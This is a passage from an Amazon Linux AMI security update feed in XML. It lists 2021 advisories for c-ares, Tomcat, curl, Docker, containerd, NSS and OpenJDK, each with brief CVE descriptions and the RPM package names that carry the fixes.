arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.35" release="1.17.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-libs-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.35" release="1.17.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-test-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.35-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1545</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1545: medium priority package update for c-ares</title><issued date="2021-10-29 16:37:00" /><updated date="2021-11-04 18:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3672:
A flaw was found in c-ares library, where a missing input validation check of host names returned by DNS (Domain Name Servers) can lead to output of wrong hostnames which might potentially lead to Domain Hijacking. The highest threat from this vulnerability is to confidentiality and integrity as well as system availability.
1988342: CVE-2021-3672 c-ares: Missing input validation of host names may lead to domain hijacking
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3672" title="" id="CVE-2021-3672" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="c-ares-devel" version="1.17.2" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-devel-1.17.2-1.8.amzn1.x86_64.rpm</filename></package><package name="c-ares" version="1.17.2" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-1.17.2-1.8.amzn1.x86_64.rpm</filename></package><package name="c-ares-debuginfo" version="1.17.2" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-debuginfo-1.17.2-1.8.amzn1.x86_64.rpm</filename></package><package name="c-ares-debuginfo" version="1.17.2" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-debuginfo-1.17.2-1.8.amzn1.i686.rpm</filename></package><package name="c-ares-devel" version="1.17.2" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-devel-1.17.2-1.8.amzn1.i686.rpm</filename></package><package name="c-ares" version="1.17.2" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-1.17.2-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1546</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1546: important priority package update for tomcat8</title><issued date="2021-10-29 16:37:00" /><updated date="2021-11-04 18:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-42340:
A memory leak flaw was found in Apache Tomcat, where an HTTP upgrade connection does not release for WebSocket connections once the WebSocket connection is closed. If a sufficient number of such requests are made, an OutOfMemoryError occurs, leading to a denial of service. The highest threat from this vulnerability is to system availability.
2014356: CVE-2021-42340 tomcat: OutOfMemoryError caused by HTTP upgrade connection leak could lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42340" title="" id="CVE-2021-42340" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.72" release="1.89.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-8.5.72-1.89.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1547</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1547: important priority package update for tomcat8</title><issued date="2021-10-26 23:35:00" /><updated date="2025-04-09 20:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-21733:
Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.
Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.
CVE-2021-41079:
A flaw was found in Apache Tomcat. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet can trigger an infinite loop, resulting in a denial of service. The highest threat from this vulnerability is to system availability.
CVE-2021-33037:
Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances, leading to the possibility of request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer-encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identity encoding; and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33037" title="" id="CVE-2021-33037" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41079" title="" id="CVE-2021-41079" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21733" title="" id="CVE-2024-21733" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-el-3.0-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.69" release="1.88.amzn1" 
epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.69-1.88.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1549</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1549: medium priority package update for curl</title><issued date="2021-11-10 22:13:00" /><updated date="2021-11-15 18:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-22947:
A flaw was found in curl. The flaw lies in how curl handles cached or pipelined responses that it receives from an IMAP, POP3, SMTP or FTP server before the TLS upgrade using STARTTLS. In such a scenario, even after upgrading to TLS, curl would trust these cached responses, treating them as valid and authenticated, and use them. An attacker could potentially use this flaw to carry out a Man-In-The-Middle attack. The highest threat from this vulnerability is to data confidentiality.
2003191: CVE-2021-22947 curl: Server responses received before STARTTLS processed after TLS handshake
CVE-2021-22946:
A flaw was found in curl. This flaw lies in the --ssl-reqd option or related settings in libcurl. Users specify this flag to upgrade to TLS when communicating with an IMAP, POP3 or FTP server. An attacker controlling such a server could return a crafted response which could lead to the curl client continuing its operation without TLS encryption, leading to data being transmitted in clear text over the network. The highest threat from this vulnerability is to data confidentiality.
2003175: CVE-2021-22946 curl: Requirement to use TLS not properly enforced for IMAP, POP3, and FTP protocols
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22946" title="" id="CVE-2021-22946" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22947" title="" id="CVE-2021-22947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.61.1" release="12.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.100.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.100.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.100.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.100.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.100.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.100.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.100.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.100.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.100.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.100.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.100.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.100.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1550</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1550: medium priority package update for docker</title><issued 
date="2021-11-11 20:21:00" /><updated date="2021-11-11 20:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-21285:
A flaw was found in Docker. Pulling an intentionally malformed Docker image manifest could lead to a crash of the `dockerd` daemon, resulting in a denial of service. The highest threat from this vulnerability is to system availability.
1924742: CVE-2021-21285 docker: daemon crash during image pull of malicious image
CVE-2021-21284:
A flaw was found in the `userns-remap` feature of Docker. The root user in the remapped namespace can modify files under /var/lib/docker/<remapping>, leading to possible privilege escalation to the root user in the host. The highest threat from this vulnerability is to data integrity.
1924740: CVE-2021-21284 docker: access to remapped root allows privilege escalation to real root
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21284" title="" id="CVE-2021-21284" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21285" title="" id="CVE-2021-21285" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="20.10.7" release="2.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-20.10.7-2.69.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="20.10.7" release="2.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-20.10.7-2.69.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1551</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1551: medium priority package update for containerd docker</title><issued date="2021-11-17 15:38:00" /><updated date="2021-11-18 21:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-41190:
In the OCI Distribution Specification version 1.0.0 and prior and in the OCI Image Specification version 1.0.1 and prior, manifest and index documents are ambiguous without an accompanying Content-Type HTTP header. Versions of Moby (Docker Engine) prior to 20.10.11 and versions of containerd prior to 1.4.12 and 1.5.8 treat the Content-Type header as trusted and deserialize the document according to that header. If the Content-Type header changed between pulls of the same ambiguous document (with the same digest), the document may be interpreted differently, meaning that the digest alone is insufficient to unambiguously identify the content of the image.
CVE-2021-41190 docker:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41190" title="" id="CVE-2021-41190" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-stress" version="1.4.6" release="7.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.6-7.11.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.6" release="7.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.6-7.11.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.6" release="7.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.6-7.11.amzn1.x86_64.rpm</filename></package><package name="docker" version="20.10.7" release="5.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-20.10.7-5.76.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="20.10.7" release="5.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-20.10.7-5.76.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1552</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1552: critical priority package update for nss</title><issued date="2021-12-01 08:34:00" /><updated date="2021-12-01 21:18:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-43527:
NSS (Network Security Services) up to and including 3.73 is vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS #7, or PKCS #12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS.
When verifying a DER-encoded signature, NSS decodes the signature into a fixed-size buffer and passes the buffer to the underlying PKCS #11 module. The length of the signature is not correctly checked when processing DSA and RSA-PSS signatures. DSA and RSA-PSS signatures larger than 16384 bits will overflow the buffer in VFYContextStr. The vulnerable code is located within secvfy.c:vfy_CreateContext.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43527" title="" id="CVE-2021-43527" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-pkcs11-devel" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.53.1-7.87.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.53.1-7.87.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.53.1-7.87.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.53.1-7.87.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.53.1" release="7.87.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-debuginfo-3.53.1-7.87.amzn1.i686.rpm</filename></package><package name="nss" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.53.1-7.87.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1553</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1553: critical priority package update for java-1.8.0-openjdk java-1.7.0-openjdk java-1.6.0-openjdk</title><issued date="2021-12-17 17:39:00" /><updated date="2021-12-17 22:57:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-45046:
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DOS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
CVE-2021-44228:
A flaw was found in the Java logging library Apache Log4j 2 in versions from 2.0-beta9 up to and including 2.14.1. This could allow a remote attacker to execute code on the server if the system logs an attacker-controlled string value containing a lookup that points at the attacker's JNDI LDAP server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228" title="" id="CVE-2021-44228" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046" title="" id="CVE-2021-45046" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.261-2.6.22.1.84.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.261-2.6.22.1.84.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.261-2.6.22.1.84.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.261-2.6.22.1.84.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.261-2.6.22.1.84.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.261-2.6.22.1.84.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.261-2.6.22.1.84.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.261-2.6.22.1.84.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.261-2.6.22.1.84.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.261-2.6.22.1.84.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.261-2.6.22.1.84.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.41-1.13.13.1.78.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.41" release="1.13.13.1.78.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.41-1.13.13.1.78.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.312.b07-0.66.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.312.b07-0.66.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.312.b07-0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.312.b07" release="0.66.amzn1" epoch="1" 